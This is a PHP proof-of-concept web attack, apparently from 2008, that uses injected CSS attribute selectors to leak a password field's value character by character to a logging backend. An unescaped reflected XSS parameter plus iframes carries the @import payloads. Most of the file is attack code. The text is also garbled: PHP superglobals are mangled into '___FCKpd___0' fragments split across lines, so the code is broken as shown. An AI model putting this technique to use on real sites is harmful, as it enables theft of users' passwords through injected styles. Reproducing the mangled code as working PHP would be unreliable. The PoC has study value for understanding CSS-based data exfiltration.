|
<?php
/***** BEGIN LICENSE BLOCK *****
CSSH - a proof of concept CSS based history crawler
Copyright (C) 2008 Sirdarckcat
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
***** END LICENSE BLOCK *****/
if (isset(___FCKpd___0
GET['source'])) {
highlight_file(__FILE__);
exit();
}
session_start();
$file=basename(__FILE__);
$d=___FCKpd___0
GET['d'];
$i=___FCKpd___0
GET['i'];
if(isset(___FCKpd___0
GET['logout']))
session_destroy();
if(isset(___FCKpd___0
GET['debug']))
print_r(___FCKpd___0
GET+___FCKpd___0
SESSION);
if(isset(___FCKpd___0
GET['css'])){
switch($d){
case 'range':
ob_start("ob_gzhandler");
___FCKpd___0
SESSION['range']=Array();
___FCKpd___0
SESSION['value_']="";
___FCKpd___0
SESSION['_value']="";
for($i=16;$i<=127;$i++){
//echo 'input[value*="\\'.dechex($i).'"]{background:url("'.$file.'?backend&d=range&i=%'.dechex($i).'");}';
___FCKpd___0
SESSION['range'][]=chr($i);
}
echo "body{background:url('$file?finished');}";
break;
case 'reading':
while(empty(___FCKpd___0
SESSION['range']))sleep(1);
sleep(5);//session_start() locks the file loading, and we wait 5 seconds for reading next char
ob_start("ob_gzhandler");
$range=___FCKpd___0
SESSION['range'];
$value_=strtr(urlencode(___FCKpd___0
SESSION['value_']),"%","\\");
___FCKpd___0
value=strtr(urlencode(___FCKpd___0
SESSION['_value']),"%","\\");
foreach($range as $char){
$i=ord($char);
echo 'input[value^="'.$value_.'\\'.dechex($i).'"]{background:url("'.$file.'?backend&d=beg&i=%'.dechex($i).'");}';
echo 'input[value$="\\'.dechex($i).___FCKpd___0
value.'"] + *{background:url("'.$file.'?backend&d=end&i=%'.dechex($i).'");}';
echo 'input[value="'.$value_."\\".dechex($i).___FCKpd___0
value.'"]+*+*{background:url("'.$file.'?backend&d=fin&i='.$value_.___FCKpd___0
value.'");}';
echo "\n";
}
break;
}
}else if(isset(___FCKpd___0
GET['backend'])){
switch($d){
case 'range':
___FCKpd___0
SESSION['range'][]=$i;
header('Location: http://p42.us/x.png');
break;
case 'beg':
___FCKpd___0
SESSION['value_'].=$i;
case 'end':
___FCKpd___0
SESSION['_value']=$i.___FCKpd___0
SESSION['_value'];
case 'fin':
___FCKpd___0
SESSION['value']=$i;
break;
}
}else if(isset(___FCKpd___0
GET['attack'])){
?>
<iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_?css%26d=range%22%3B</style>"></iframe>
<iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_/_?css%26d=reading%22%3B</style>"/></iframe>
<iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_/_/_?css%26d=reading%22%3B</style>"/></iframe>
<iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_/_/_/_?css%26d=reading%22%3B</style>"/></iframe>
<iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_/_/_/_/_?css%26d=reading%22%3B</style>"/></iframe>
<iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_/_/_/_/_/_?css%26d=reading%22%3B</style>"/></iframe>
<iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_/_/_/_/_/_/_?css%26d=reading%22%3B</style>"/></iframe>
<?php
}else{
if(isset(___FCKpd___0
POST['pass'])){
___FCKpd___0
SESSION['knownvalue']=___FCKpd___0
POST['pass'];
}
?>
<html>
<head>
<title>Start</title>
<?php echo ___FCKpd___0
GET['xss'];?>
</head>
<body>
<form method=POST>
Enter something here and press enter <input name="pass" type="password" value="<?php echo ___FCKpd___0
SESSION['knownvalue']; ?>"/>
</form>
</body>
</html>
<?php
}
?>
|
推荐
评论(0条)
